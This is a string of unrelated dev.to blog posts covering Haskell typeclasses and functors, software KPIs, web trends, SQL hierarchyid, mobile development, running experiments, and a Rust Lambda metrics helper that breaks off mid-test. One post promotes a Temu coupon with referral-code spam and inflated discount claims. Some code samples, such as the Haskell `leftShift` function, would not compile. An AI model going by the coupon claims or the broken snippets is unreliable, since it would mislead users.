> This is part 3 of a series of articles entitled *Functional Patterns*. > > Make sure to check out the rest of the articles! > > 1. [The Monoid](https://dev.to/if-els/functional-patterns-the-monoid-22ef) > 2. [Compositions and Implicitness](https://dev.to/if-els/functional-patterns-composition-and-implicitness-4n08) ## Generics and Typeclasses To be correct, a function must type-check, and is therefore provable. But in the case of *generalized* functions, meant to deal with various types, this immediately shows as a pain point. To make a `double` function work across types, we would have to define them separately! ```haskell doubleInt :: Int -> Int doubleChar :: Char -> Char doubleFloat :: Float -> Float -- ... ``` And for any self-respecting programmer, you should already be finding yourself absolutely **appalled** by this. We'd just learned about a pattern for building case-handling using *partial application* but we can't really apply it here since our type signatures won't allow that, and our function **has** to type-check. Thankfully, this is already a feature in most modern programming languages. We are allowed to define a `generic` type. A *hypothetical* type that only has to verify matching positions in the function signature or variable declarations. ```c // c++ template <typename T> T double(T x) { return x*2; } ``` ```rust // rust fn double<T>(x: T) -> T { return x*2; } ``` ```hs -- haskell double :: a -> a double = (*2) -- partially applied multiplication ``` And that should solve our problem! As long as the compiler is given these *generics*, it can figure out what types it has to use at run-time (Rust actually still does this inference at compile-time!). However, even though there is merit in this implementation— there is still a glaring flaw, that actually gets pointed out by the Haskell compiler, as the above Haskell code actually raises an error. > No instance for ‘Num a’ arising from a use of ‘*’... We've defined a type, but we aren't always going to be sure this type has the *capacity* to be doubled. Sure, this immediately works on numbers, but what's stopping the user from calling `double` on a String? A list? Without a predefined *method* for doubling these types, they should not be allowed as arguments, in the first place. So contrary to the name of *generics*, we're going to have to get a bit more *specific, but still general*. This is where **typeclasses** come in, or also known more commonly in the imperative world as **interfaces**. Again, if you're using any language that has been made later than C++, you should have access to some implementation of interfaces. Interfaces, compared to generics, specify some sort of *capability* of types that can be *categorized* under it. Here is a fixed version of our previous code. ```haskell double :: (Num a) => a -> a -- a has to be of typeclass Num double = (*2) ``` or in Go: ```go // We first create an interface that is the union of floats and integers. type Num interface { ~int | ~float64 // ... plus all other num types } func double[T Num](a T) T { return a * 2 } ``` For brevity's sake we'll say that Haskell doesn't really deal with embedded state in their interfaces, such as Typescript's and Go's interfaces (a constraint brought upon by pure functional rules). So even though you might be able to define required *attributes* of a type to be under an interface, know that *pure* interfaces only have to define **functions** or **capabilities** of the type. And by capabilities in this context, we are talking about if the type has a *dependency* in the form of a doubling function— is the compiler *taught* how to double it? ```hs import Control.Monad (join) class CanDouble a where double :: a -> a instance CanDouble Int where double = (* 2) instance CanDouble Float where double = (* 2) -- we tell the compiler that doubling a string is concatenating it to itself. instance CanDouble String where double = join (++) -- W-combinator, f x = f(x)(x) ``` And now we're pretty much back to where we were at the start when it comes to code repetition, isn't that funny? But this fine-grained control of implementation is actually where the power of this comes in. If you've ever heard of the *Strategy* pattern before, this is pretty much it, in the functional sense. ```hs quadruple :: (CanDouble a) => a -> a quadruple = double . double leftShift :: (CanDouble a) => Int -> a -> a leftShift n e | e <= 0 = n | otherwise = leftShift (double n) $ e - 1 ``` These functions type-check now, all because we *taught* the compiler how double types under the `CanDouble` typeclass. We can achieve something similar in Go, a big caveat being that we can only define interface methods on *non-primitive* types. Meaning, we have to define wrapper structs to primitive types. ```go type CanDouble interface { double() CanDouble } type String string type Number interface { ~int | ~float64 // ... plus all other num types } type Num[T Number] struct { v T } func (s String) double() String { return s + s } func (n Num[T]) double() Num[T] { return Num[T]{n.v * 2} } func quadruple(n CanDouble) CanDouble { return n.double().double() } func leftShift(n CanDouble, e uint) CanDouble { for i := uint(0); i < e; i++ { n = n.double() } return n } ``` This honestly is kind of a bummer, but no worries, as most of the time you're going to be dealing with interfaces will be with custom types and structs. ## Categories > Category theory is a general theory of mathematical structures and their relations. We've briefly brushed upon *category theory* back in `The Monoid`, and we'd like to keep it that way, only close encounters. I will be referencing it here and there, but rest assured: you won't need to have a background in it to grasp whatever follows. However, there is no doubt that we have encountered *sets* before. As a brief recap, Sets can be thought of as a **collection** of elements. These elements can be absolutely *anything*. ``` { 0, 1, 2, 3, ... } -- the set of natural numbers { a, b, c, ..., z} -- the set of lowercase letters { abs, min, max, ... } -- the set of `Math` functions in Javascript { {0, 1}, {a, b}, {abs, min} } -- the set of sets containing the first 2 elements of the above sets ``` Adding on to that, we have these things called **morphisms**, which we can think of a mapping between elements. > Very big omission here on the definitions of morphisms, in that they are *relations* between elements, and not strictly functions/mappings, > you can look it up if you are curious. We can say a function like `toUpper()` is a morphism between lowercase letters *to* uppercase letters, just like how we can say `double = (*2)` is a morphism from numbers *to* numbers (specifically even numbers). And if we group these together, the set of elements and their morphisms, we end up with a *category*. > Again, omission, categories have more constraints such as a Composition partial morphism and identities. But these properties are not that relevant here. If you have a keen eye for patterns you'd see that there is a parallel to be drawn between categories and our interfaces! The *objects* (formal name for a category's set of elements) of our category are our *instances*, and our *implementations* are our *morphisms*! ```hs class CanDouble a where double :: a -> a -- `Int` is our set of elements { ... -1, 0, 1, ... } -- `(* 2)` is a morphism we defined -- ... (other omissions) -- ... -- Therefore, `CanDouble Int` is a Category. instance CanDouble Int where double = (* 2) ``` ## Functors Man, that was a lot to take in. Here's a little bit more extra: A **Functor** is a type of a function (also known as a mapping) from *category* to *another category* (which can include itself, these are called *endofunctors*). What this essentially means, is that it is a transformation on some category that maps every element to a corresponding element, and every morphism to a corresponding morphism. An output category based on the input category. In Haskell, categories that can be transformed by a functor is described by the following typeclass (which also makes it a category in of itself, that's for you to ponder): ```hs class Functor f where fmap :: (a -> b) -> f a -> f b -- ... ``` `f` here is what we call a *type constructor*. By itself it isn't a *concrete* type, until it is accompanied by a concrete type. An example of this would be how an *array* isn't a type, but an array *of `Int`* is. The most common form of a type constructor is as a *data type* (a struct). From this definition we can surmise that all we need to give to this function `fmap` is a function `(a -> b)` (which is our actual functor, don't think about the naming too much), and this would transform a type `f a` to type `f b`, a different type in the *same* category. > Yes, this means Haskell's `Functor` typeclass is actually a definition for *endofunctors*, woops! ![image](https://github.com/44mira/articles/assets/116419708/fcef5a8c-95f1-420e-959b-d5a17bdb6f1d) If all of that word vomit was scary, a very oversimplified version for the requirement of the `Functor` typeclass is that you are able to `map` values to other values in the same category. Arguably the most common `Functor` we use are arrays: ```hs instance Functor [] where -- fmap f [] = [] -- fmap f (a:as) = f a : fmap as -- simplified fmap :: (a -> b) -> [a] -> [b] fmap f arr = map f arr ``` We are able to map an array of `[a]` to `[b]` using our function (or functor) `f`. The typeconstructor of `[]` serves as our category, and so our functor is a transformation from one type of an array to another. So, formally: the `map` function, though commonly encountered nowadays in other languages and declarative frameworks such as *React*, is simply the application of an *endofunctor* on the category of *arrays*. Wow. That is certainly a description. Here are more examples of functors in action: ```go // Go type Functor[T any] interface { fmap(func(T) T) Functor[T] } type Pair[T any] struct { a T b T } type List[T any] struct { get []T } // Applying a functor to a Pair is applying the function // to both elements func (p *Pair[T]) fmap(f func(T) T) Pair[T] { return Pair[T]{ // apply f to both a and b f(p.a), f(p.b), } } func (a *List[T]) fmap(f func(T) T) List[T] { res := make([]T, len(a.get)) // create an array of size len(a.get) for i, v := range a.get { res[i] = f(v) } return List[T]{res} } ``` ```hs -- haskell data Pair t = P (t, t) instance Functor Pair where fmap f (P (x, y)) = P (f x, f y) ``` So all that it takes to fall under the `Functor` (again, endofunctor), interface is to have a definition on how to *map* the contents of the struct to any other type (including its own). > This is another simplifcation, functors also need to have property of identity and composition. To put simply, whenever you do a `map`, you're not only transforming the elements of your array (or struct), you're also transforming the functions you are able to apply on this array (or struct). This is what we mean by mapping **both** *objects* and *morphisms* to different matching objects and morphisms in the *same* category. This is important to note as even though we end up in the same category (in this context, we map an array, which results in another array), these might have differing functions or implementations available to them (though most of them will be mapped to their relatively equivalent functions, such as a `reverse` on an array of `Int` to `reverse` on an array of `Float`). > This is where the oversimplifcation kinda messes us up a bit, because if we follow only our definition, we could say that reducing functions such as `sum` and `concat` are functors from the category of arrays to atoms, but this isn't necessarily true. As functors also require that you *preserve* the *categorical structure*, which won't be covered in this article series as that's way too deeply rooted in category theory. --- Apologies if this article contained **way** more math than applications, but understanding these definitions will help us greatly in understanding the harder patterns later in this series, namely `Applicatives` and finally `Monads`. > A monad is a *monoid* in the *category* of *endofunctors*. We're getting there! :>
if-els
1,909,144
Essentialism in KPIs: Focusing on Key Metrics for Software Development Success
Introduction In the fast-paced world of software development, tracking progress and...
0
2024-07-02T17:00:44
https://dev.to/davitacols/essentialism-in-kpis-focusing-on-key-metrics-for-software-development-success-mdo
softwaredevelopment, software, kpi, webdev
## Introduction In the fast-paced world of software development, tracking progress and ensuring project success can be challenging. Key Performance Indicators (KPIs) are crucial metrics that help project managers and teams monitor performance, identify issues, and drive improvements. This guide explores essential KPIs that can lead to successful software development projects. ## Why KPIs Matter in Software Development KPIs provide quantifiable measurements that help in assessing the efficiency, effectiveness, and health of a software development project. They enable teams to: - Monitor progress against goals - Identify areas for improvement - Make data-driven decisions - Ensure timely delivery and quality ## Essential KPIs for Software Development ### Velocity - **Definition:** The amount of work a team completes in a given iteration (e.g., sprint). - **Importance:** Helps predict future performance and plan releases. ### Cycle Time - **Definition:** The time it takes to complete a task from start to finish. - **Importance:** Indicates the efficiency of the development process and helps identify bottlenecks. ### Lead Time - **Definition:** The total time from a request being made until it is delivered. - **Importance:** Measures overall efficiency and responsiveness of the team. ### Code Quality - **Definition:** Measured using metrics like code churn (frequency of code changes), code complexity, and number of defects. - **Importance:** Ensures the maintainability and reliability of the software. ### Defect Density - **Definition:** The number of defects per size of the code (e.g., per 1000 lines of code). - **Importance:** Provides insights into the quality of the codebase and helps focus on areas needing improvement. ### Test Coverage - **Definition:** The percentage of code covered by automated tests. - **Importance:** Ensures that the code is thoroughly tested, reducing the likelihood of bugs in production. ### Customer Satisfaction (CSAT) - **Definition:** A measure of how satisfied customers are with the software product. - **Importance:** Directly correlates with the success and usability of the product. ### Burnout Rate - **Definition:** The rate at which team members are experiencing burnout. - **Importance:** Ensures the well-being of the team, which is crucial for long-term productivity. ### Release Burndown - **Definition:** Tracks the progress towards completing a release, showing remaining work versus time. - **Importance:** Helps in tracking whether the project is on schedule. ## Implementing KPIs in Your Project ### Define Clear Objectives Understand what you aim to achieve with your project and select KPIs that align with these goals. ### Choose Relevant KPIs Not all KPIs are suitable for every project. Choose those that provide the most valuable insights for your specific context. ### Regular Monitoring Regularly track and review KPIs to stay informed about the project’s health and progress. ### Adjust as Necessary Be flexible and ready to adjust your KPIs as the project evolves and new priorities emerge. ### Communicate KPIs Ensure all team members understand the KPIs, their importance, and how they are measured. ## Conclusion KPIs are vital tools in the arsenal of software development teams, providing a clear picture of project performance and areas for improvement. By selecting the right KPIs and monitoring them consistently, teams can ensure successful project delivery, high-quality software, and satisfied customers. Implement these KPIs in your projects to enhance transparency, drive performance, and achieve your development goals.
davitacols
1,909,141
Embracing the Evolution of Web Development: Trends and Best Practices for 2024
As we stride into 2024, the landscape of web development continues to evolve at an astonishing pace....
0
2024-07-02T16:58:33
https://dev.to/abdul_rahman_19d731503a82/embracing-the-evolution-of-web-development-trends-and-best-practices-for-2024-56ca
As we stride into 2024, the landscape of web development continues to evolve at an astonishing pace. With new technologies, frameworks, and best practices emerging, developers need to stay ahead of the curve to build robust, scalable, and efficient web applications. In this article, we'll explore the latest trends shaping the web development industry and provide insights into best practices that can help developers thrive in this dynamic environment. 1. The Rise of Jamstack Architecture Jamstack (JavaScript, APIs, and Markup) is gaining significant traction due to its ability to deliver faster, more secure, and scalable websites. By decoupling the frontend from the backend, Jamstack allows developers to build static websites that are pre-rendered and served via CDNs, resulting in improved performance and security. Tools like Gatsby, Next.js, and Nuxt.js are becoming staples in the Jamstack ecosystem, enabling developers to create rich, interactive experiences with ease. 2. Progressive Web Apps (PWAs) Take Center Stage Progressive Web Apps continue to blur the lines between web and native applications. PWAs offer an app-like experience with features such as offline access, push notifications, and home screen installation. With Google and other tech giants advocating for PWAs, developers can leverage tools like Workbox and Lighthouse to optimize performance and ensure their applications meet the PWA standards. 3. Embracing AI and Machine Learning Artificial Intelligence (AI) and Machine Learning (ML) are transforming the way we develop web applications. From chatbots and recommendation systems to advanced data analytics, AI-driven solutions are enhancing user experiences and driving business value. Libraries like TensorFlow.js and Brain.js allow developers to integrate AI capabilities directly into their web applications, making it easier to implement intelligent features without extensive backend infrastructure. 4. Serverless Architecture and Microservices Serverless computing and microservices architecture are revolutionizing backend development. By abstracting server management and breaking down applications into smaller, independent services, developers can achieve greater scalability and flexibility. Platforms like AWS Lambda, Azure Functions, and Google Cloud Functions are leading the charge, enabling developers to focus on writing code rather than managing infrastructure. 5. Enhancing User Experience with Motion UI Motion UI is becoming an essential tool for creating engaging and interactive web experiences. Smooth animations, transitions, and micro-interactions can significantly enhance user engagement and satisfaction. Libraries such as Framer Motion and GreenSock (GSAP) provide developers with powerful tools to implement sophisticated animations that bring their applications to life. 6. The Importance of Web Accessibility Web accessibility is no longer an afterthought; it is a fundamental aspect of web development. Ensuring that websites are accessible to users with disabilities is not only a legal requirement in many regions but also a moral imperative. Developers should adhere to the Web Content Accessibility Guidelines (WCAG) and leverage tools like axe and Lighthouse to audit and improve the accessibility of their web applications. 7. The Shift Towards Low-Code/No-Code Solutions Low-code and no-code platforms are democratizing web development by allowing non-developers to create web applications with minimal coding knowledge. While these platforms are not a replacement for traditional development, they offer valuable tools for rapid prototyping and development. Tools like Bubble, Webflow, and OutSystems are gaining popularity, enabling faster development cycles and empowering a broader range of individuals to contribute to the web development process. Best Practices for Modern Web Development To succeed in the ever-changing world of web development, it's essential to adhere to best practices that ensure code quality, performance, and maintainability. Here are a few key practices to keep in mind: Write Clean and Modular Code: Maintain a clean codebase by following coding standards and using modular components. This enhances readability, reusability, and collaboration within development teams. Optimize Performance: Prioritize performance optimization techniques such as lazy loading, code splitting, and image optimization. Tools like Lighthouse and WebPageTest can help identify performance bottlenecks. Implement Robust Testing: Ensure the reliability of your applications by implementing comprehensive testing strategies, including unit tests, integration tests, and end-to-end tests. Frameworks like Jest, Mocha, and Cypress are invaluable for testing various aspects of your application. Stay Informed: Continuously learn and stay updated with the latest trends, tools, and best practices in web development. Engage with the developer community through forums, blogs, conferences, and social media to stay ahead of the curve. Conclusion The web development landscape in 2024 is marked by rapid innovation and constant change. By embracing emerging trends such as Jamstack, PWAs, AI, and serverless architecture, and by adhering to best practices, developers can create cutting-edge web applications that deliver exceptional user experiences. Stay curious, keep learning, and continue to push the boundaries of what's possible in [web development ] www.iamrahman.in
abdul_rahman_19d731503a82
1,909,140
Hello Everyone!
I have just started here. So, nothing is known yet. But I hope to get familiar soon.😊
0
2024-07-02T16:56:27
https://dev.to/emon12700/hello-everyone-2akh
I have just started here. So, nothing is known yet. But I hope to get familiar soon.😊
emon12700
1,909,138
Temu New User Coupon [AAV67880]: Up To 75% OFF For First-Time Users
Offers: AAV67880 Up to 75% discount for new users Up to 90% discount on select items and clearance...
0
2024-07-02T16:50:51
https://dev.to/sonuprasad/temu-new-user-coupon-aav67880-up-to-75-off-for-first-time-users-216d
temu, temu100off, temudiscount, temucouponcod
- Offers: AAV67880 - Up to 75% discount for new users - Up to 90% discount on select items and clearance sales - 40% discount for existing users Validity: July 2024 Our Temu first-time user coupon codes are designed just for new customers, offering the biggest discounts and the best deals currently available on Temu. To maximize your savings, download the Temu app and apply our Temu new user coupon during checkout.
sonuprasad
1,909,137
🚀 🚀 Working with hierarchical data in .Net Core using the hierarchyid data type.(.Net Core 8) 🚀 🚀
🚀 HierarchyId Data Type The hierarchyid data type was introduced with SQL Server 2008. It’s...
23,809
2024-07-02T16:48:55
https://dev.to/ahmedshahjr/working-with-hierarchical-data-in-net-core-using-the-hierarchyid-data-typenet-core-8-1315
webdev, dotnet, beginners, programming
🚀 HierarchyId Data Type The hierarchyid data type was introduced with SQL Server 2008. It’s specifically designed to represent and manipulate hierarchical data. Hierarchical data structures contain parent-child relationships, and hierarchyid provides an efficient way to store and query such data. In the context of databases, both Azure SQL and SQL Server support this data type. 🚀 Querying Hierarchical Data Once you’ve stored hierarchical data using hierarchyid, you can perform various queries:Finding Ancestors and Dependents: You can query for ancestors (parents) and dependents (children) of specific items. 💡 Depth-Based Queries Retrieve all items at a certain depth within the hierarchy. 🚀 Benefits of Using HierarchyId It simplifies querying hierarchical data, making it easier and faster. The hierarchyid type is more aligned with .NET norms than SqlHierarchyId. It’s designed to work seamlessly with Entity Framework Core (EF Core). hierarchyid is a valuable tool for managing hierarchical data in .NET Core applications. 🌟 If you have any specific questions or need further assistance, feel free to ask! 😊 Github Documentation => https://github.com/efcore/EFCore.SqlServer.HierarchyId
ahmedshahjr
1,909,124
My Journey into Mobile Development with HNG Internship.
Hi there! I'm excited to share my journey as I start the HNG Internship and dive into mobile...
0
2024-07-02T16:47:38
https://dev.to/ogodo_moses_dacb80df1025b/my-journey-into-mobile-development-with-hng-internship-5o5
programming, tutorial, flutter, intern
Hi there! I'm excited to share my journey as I start the HNG Internship and dive into mobile development. Mobile apps are a big part of our lives, and making them is both fun and challenging. Let's talk about the platforms we use to build these apps and the common software architecture patterns. **MOBILE APPS DEVELOPMENT PLATFORMS**. 1. **Native Development:** This means building apps specifically for either Android or iOS. For Android, you use Java or Kotlin, and for iOS, you use Swift or Objective-C. **ADVANTAGES ** i. Great Performance: Native apps run fast and smoothly. ii. Full Access to Features: You can use all the features of the device. **DISADVANTAGES** i. Time-Consuming: You need to build separate apps for Android and iOS. ii. More Maintenance: Maintaining two codebases is a lot. 2. **Cross-Platform Development:** This means building one app that works on both Android and iOS. Tools like React Native and Flutter help with this development. **ADVANTAGES:** i. Saves Time: You write the code once and it works on both platforms. ii Cheaper: It's less expensive than building two separate apps. **DISADVANTAGES:** i)Slower Performance: These apps might not be as fast as native apps. ii) Limited Features: Some device features might not be fully available. **Common Software Architecture Patterns** **1. Model-View-Controller (MVC):** This pattern divides the app into three parts: the Model (data), the View (UI), and the Controller (logic). **ADVANTAGES:** i. Organized Code: Easy to manage and test. ii. Clear Structure: Each part has a specific role. **DISADVANTAGES:** i. Complex for Big Apps: Can get complicated. ii. Interconnected Parts: Changes in one part can affect others. **2. Model-View-ViewModel (MVVM):** This is great for apps with complex user interfaces. It separates the UI from the business logic. **ADVANTAGES:** i. Clean Separation: Better organization and easier to update. ii. Automatic Updates: UI updates automatically when data changes. **DISADVANTAGES** i. Learning Curve: Takes time to learn. ii. More Complex: Adds some overhead to the project. **Why I Joined the HNG Internship** I joined the HNG Internship to learn from the best and grow my skills in mobile development. The program offers real-world projects and a chance to work with talented developers from around the world. It’s a great opportunity to improve my coding skills and build awesome apps. If you want to learn more about the HNG Internship, check out [this]( https://hng.tech/internship) link and [this ](https://hng.tech/hire). It’s an amazing program!
ogodo_moses_dacb80df1025b
1,909,103
Using experiments to ship faster
Eliminate the all the hard stuff early.
0
2024-07-02T16:47:00
https://dev.to/joshnuss/using-experiments-to-ship-faster-5329
productivity, webdev, programming
--- title: Using experiments to ship faster published: true description: Eliminate the all the hard stuff early. tags: productivity, webdev, programming cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/el4tjgo2h58m6bb8wy1m.png published_at: 2024-07-02 16:47 +0000 --- Has this ever happened to you? You're eager to start coding, so you open your editor and start smashing the keyboard. After a few weeks something unexpected happens, you encounter a major blocker. Now you have to rework the codebase to get around the problem and a lot of high quality work gets scrapped. This is very expensive and wasteful and happens all too frequently. But there is a way to reduce the chance this happens. ## Avoiding "Fake progress" When a project starts, there can be pressure to show fast progress. But unfortunately, not all progress is equal. Quick progress might make your stakeholders happy early on. But at what expense? If it's at the expense of completing the project, or long delays later, then it can be considered "fake progress". If we start by building the plumbing, the obvious and boring parts we already know how to do - are we really making meaningful progress? Just checking off on busywork won't reduce the overall uncertainty of the project. It just delays the more challenging stuff into the future. What if we could change that? ## Finding the Real work Meaningful progress comes from solving difficult issues as early as possible. This is real work. It has the potential to reduce the cost of projects by orders of magnitude. Because time is very precious, the faster we can locate real problems, the more meaningful headway we'll make. What we need is a way to locate the biggest unknowns, frictions, and blockers as early as possible. ## Improving work with experiments One solution is to make a list of the hard parts (aka "unknowns") and experiment with those before you start building the solution. These experiments are great, because with just a small amount of work they can remove large uncertainties from the project. They allow us to encounter uncertainties as early as possible, and eliminate them before they become costly blockers. Instead of starting a project by writing code in a complex code base and wasting energy on integration and quality. Experimenting allows us to test problems in isolation, without the cost of integration. This keeps re-work low, because we're not undoing complex production code written at a high quality bar. Once most of the unknowns are resolved, coding becomes a lot easier. It's just a matter of connecting the discovered solutions together, just like snapping together a bunch of LEGOs. ## How to experiment Next time you're starting a project, do this: 1. **Collect** a list of unknowns. These are things you think will be hard, or haven't done before. 2. **Prioritize** the list to tackle the most critical issues first. 3. **Estimate** how much each experiment will take. For example, 1-2 hours each. Then for each experiment: 1. **Build** a minimal solution, being mindful of the timebox. 2. **Capture** the result. Either in a GitHub repo or a code snippet on your machine. 3. **Document** the solution or any caveats encountered. Once you've worked through your list, and assuming you haven't encountered any major blockers, you're ready to start building! yay ## Finding success To make sure your experiments are a success, here's a few things to be mindful of: ### Be careful of time management Don't overdo it. For a 6 week project, a good number of experiments is 10-15. These should take 1-3 days to finish. It's important to timebox these. ### Long experiments are bad experiments Keep your experiments small. Break them into smaller chunks if needed. If they're taking too long, it could be a tell that your project is too big and that the scope should be reduced. ### Don't experiment with obvious things For example, if you've built a login form before, it's not an unknown for you anymore. Don't spend time on it. Of course, if you've never used OAuth before, then building a OAuth integration is worth an experiment. What's unknown depends a lot on each developers's own experience. ### Be very careful when re-using an experiment Sometimes it can helpful to build a series of experiments, where each one depends on the code of the last, but sometimes it's not. Remember to always consider what the integration cost is. A key point of experimenting is avoiding the cost of connecting parts together. ### Keep the quality low Don't write clean code. Don't write DRY or SOLID code. Don't write tests. The only thing we want is a working solution. It can be super ugly. Worry about quality later, when you start building. ## Conclusion A great way to conserve energy, is through early experimentation. By dealing with uncertainty at the start of the project, the danger of encountering large blockers later is greatly diminished. This eliminates re-work, unexpected costs, and creates a more enjoyable and calm development experience. Happy coding ✌️
joshnuss
1,902,676
AWS Lambda Rust EMF metrics helper
Photo by Isaac Smith on Unsplash Introduction In the AWS Lambda ecosystem, there is an...
0
2024-07-02T16:44:06
https://dev.to/aws-builders/aws-lambda-rust-emf-metrics-helper-4glp
aws, rust, serverless
Photo by <a href="https://unsplash.com/@isaacmsmith?utm_content=creditCopyText&utm_medium=referral&utm_source=unsplash">Isaac Smith</a> on <a href="https://unsplash.com/photos/pen-om-paper-AT77Q0Njnt0?utm_content=creditCopyText&utm_medium=referral&utm_source=unsplash">Unsplash</a> # Introduction In the AWS Lambda ecosystem, there is an awesome set of tools created to cover common scenarios when creating serverless functions. They are gathered together as `Lambda Powertools` and they are available in a few languages. At the moment there is no version of `Powertools` for Rust (they will be created eventually). I saw this as a great opportunity to learn by building small helpers for AWS Lambda in Rust. I am not attempting to replicate the Powertools suite. Instead, I’ll focus on implementing specific functionalities. # Metrics I decided to start by creating utilities for CloudWatch custom metrics. When running AWS Lambda we have two main options to put our custom metrics to CloudWatch - using SDK, or printing the log shaped accordingly to Embedded Metrics Format (EMF). The latter is much cheaper and faster, but it requires some boilerplate. EMF lets you publish up to 100 metric points at once and define up to 30 dimensions. # Goal I create the library, which would let us - create metrics for defined namespace and dimensions - add more dimensions up to maximum limit defined by AWS - handle gracefully going beyond the limit of 100 metric points - publish metrics automatically once Lambda function finishes As you see, not all functionalities provided by original Powertools are covered, yet the library should be already usable (and even useful, hopefully) # Implementation The complete code for this implementation is available [in the GitHub repository](https://github.com/szymon-szym/lambda_helpers_metrics) I need two main pieces. First are types (structs, enums) that map to the EMF. I can use some `serde` magic to seamlessly serialize them to the JSON. The second piece would be a struct with some methods to hold a mutable state of current metrics and allow actions on it. ## Types EMF format is defined [here](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch_Embedded_Metric_Format_Specification.html). After translating it to Rust I got something like this. ```Rust // lib.rs //... /// https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch_Embedded_Metric_Format_Specification.html#CloudWatch_Embedded_Metric_Format_Specification_structure_metricdefinition #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "PascalCase")] pub struct MetricDefinition { name: String, unit: MetricUnit, storage_resolution: u64, } /// https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch_Embedded_Metric_Format_Specification.html#CloudWatch_Embedded_Metric_Format_Specification_structure_metricdirective #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "PascalCase")] pub struct MetricDirective { namespace: String, dimensions: Vec<Vec<DimensionName>>, metrics: Vec<MetricDefinition>, } /// https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch_Embedded_Metric_Format_Specification.html#CloudWatch_Embedded_Metric_Format_Specification_structure_metadata #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "PascalCase")] pub struct MetadataObject { timestamp: i64, cloud_watch_metrics: Vec<MetricDirective>, } #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "PascalCase")] pub struct CloudWatchMetricsLog { #[serde(rename = "_aws")] aws: MetadataObject, #[serde(flatten)] dimensions: Dimensions, #[serde(flatten)] metrics_values: MetricValues, } // ... ``` - I use `new type pattern` to keep my types expressive ```Rust // lib.rs // ... #[derive(Debug, Serialize, Deserialize, Clone)] #[serde(rename_all = "PascalCase")] pub struct Dimensions(HashMap<String, String>); #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "PascalCase")] pub struct MetricValues(HashMap<String, f64>); #[derive(Debug, Serialize, Deserialize)] pub struct DimensionName(String); #[derive(Debug, Serialize, Deserialize)] pub struct Namespace(String); // ... ``` - I decided to keep `metrics values` as a float. For some metrics, I would use integers, but I didn't want to add more complexity at this point - Metrics units are defined with enums ```Rust // lib. rs // ... #[derive(Debug, Serialize, Deserialize, Clone, PartialEq)] pub enum MetricUnit { Seconds, Microseconds, Milliseconds, Bytes, Kilobytes, Megabytes, Gigabytes, Terabytes, Count, BytesPerSecond, KilobytesPerSecond, MegabytesPerSecond, GigabytesPerSecond, TerabytesPerSecond, BitsPerSecond, KilobitsPerSecond, MegabitsPerSecond, GigabitsPerSecond, TerabitsPerSecond, CountPerSecond, } // ... ``` The only logic I added here is the `into` function, which handles conversion to string, needed for printing the log. As we will see in the moment, this implementation requires some fixes, but I intentionally leave it as is for now, to showcase `clippy` capabilities. ```Rust // lib.rs // ... impl CloudWatchMetricsLog { pub fn into(self) -> String { serde_json::to_string(&self).unwrap() } } // ... ``` ## Domain Let's first define the domain types ```Rust // lib.rs // ... #[derive(Debug, Serialize, Deserialize)] pub struct Metric { name: String, unit: MetricUnit, value: f64, } // ... #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "PascalCase")] pub struct Metrics { namespace: Namespace, dimensions: Dimensions, metrics: Vec<Metric>, } // ... ``` Now we need some functionalities. ### Add dimension This might fail, so no matter if we like it or not, we need to return `Result` and leave the responsibility of handling it to the caller. I will work on error types separately, so for now the `Err` is just a `String` ```Rust // lib.rs // ... impl Metrics { // ... pub fn try_add_dimension(&mut self, key: &str, value: &str) -> Result<(), String> { if self.dimensions.0.len() >= MAX_DIMENSIONS { Err("Too many dimensions".into()) } else { self.dimensions.0.insert(key.to_string(), value.to_string()); Ok(()) } } // ... ``` ### Add metric At first glance, this operation should return `Result` too, because, we might reach the limit of 100 metrics. Additionally, we can't post two data points for the same metric in one log. Both cases are easily solvable - it is enough to flash current metrics and start collecting metrics from scratch. The trade-off is that we expect metrics not to impact the performance of our lambda function. On the other hand, printing the log with a limited size sounds like a better strategy than returning an `Err` and forcing the caller to deal with it. ```Rust // lib.rs // ... impl Metrics { // ... pub fn add_metric(&mut self, name: &str, unit: MetricUnit, value: f64) { if self.metrics.len() >= MAX_METRICS || self.metrics.iter().any(|metric| metric.name == name) { self.flush_metrics(); } self.metrics.push(Metric { name: name.to_string(), unit, value, }); } // ... ``` ### Flush metrics Flushing metrics means simply printing them to the console and removing current entries from our object ```Rust // lib.rs // ... impl Metrics { // ... pub fn flush_metrics(&mut self) { let payload = self.format_metrics().into(); println!("{payload}"); self.metrics = Vec::new(); } // ... ``` ### Format metrics The main part of the logic, which is at the same time just transforming domain types to the AWS EMF types ```Rust // lib.rs // ... pub fn format_metrics(&self) -> CloudWatchMetricsLog { let metrics_definitions = self .metrics .iter() .map(|entry| entry.into()) .collect::<Vec<MetricDefinition>>(); let metrics_entries = vec![MetricDirective { namespace: self.namespace.0.to_string(), dimensions: vec![self .dimensions .0 .keys() .map(|key| DimensionName(key.to_string())) .collect()], metrics: metrics_definitions, }]; let cloudwatch_metrics = MetadataObject { timestamp: Utc::now().timestamp_millis(), cloud_watch_metrics: metrics_entries, }; let metrics_values = self .metrics .iter() .map(|metric| (metric.name.to_string(), metric.value)) .collect::<HashMap<_, _>>(); let cloudwatch_metrics_log = CloudWatchMetricsLog { aws: cloudwatch_metrics, dimensions: self.dimensions.clone(), metrics_values: MetricValues(metrics_values), }; cloudwatch_metrics_log } // ... ``` ## Flush metrics automatically at the end of the function One more thing to implement. the user can manually flush metrics, but it is not very convenient. Let's flush metrics once the function ends, which means that our `metrics` object goes out of scope ```Rust // lib.rs // ... impl Drop for Metrics { fn drop(&mut self) { println!("Dropping metrics, publishing metrics"); self.flush_metrics(); } } ``` ## Unit tests Business logic isn't very complex, so I can create a few test cases with basic assertions. ```Rust #[cfg(test)] mod tests { use super::*; #[test] fn should_create_metrics() { let mut metrics = Metrics::new("test_namespace", "service", "dummy_service"); metrics.add_metric("test_metric_count", MetricUnit::Count, 1.0); metrics.add_metric("test_metric_seconds", MetricUnit::Seconds, 22.0); let log = metrics.format_metrics(); assert_eq!(log.aws.cloud_watch_metrics[0].namespace, "test_namespace"); 